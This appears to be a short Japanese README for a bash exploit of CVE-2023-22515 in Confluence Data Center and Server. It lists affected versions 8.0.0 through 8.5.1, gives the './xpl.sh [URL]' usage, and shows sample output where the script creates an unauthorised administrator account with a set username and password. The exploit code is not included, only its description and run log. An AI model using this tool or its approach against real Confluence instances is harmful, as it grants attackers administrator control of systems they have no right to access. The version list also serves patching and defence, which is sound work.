
Bashスクリプトで、Confluence Data CenterおよびServerのCVE-2023-22515を悪用し、不正な管理者アカウントを作成して、不正アクセスを可能にします。
CVE-2023-22515 用のシンプルな bash スクリプトエクスプロイト。
Confluence Data Center および Server インスタンスには、アクセス制御の欠陥(CVE-2023-22515)が存在し、攻撃者が不正な Confluence 管理者アカウントを作成し、Confluence インスタンスにアクセスできるようになります。
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] ホストが脆弱かどうかを確認中...
脆弱 --> レスポンスコード: 200
[+] ターゲットをエクスプロイト中...
[+] エクスプロイト完了!!!
[INFO] 作成されたユーザー: a123456
[INFO] 作成されたパスワード: ChangeMe123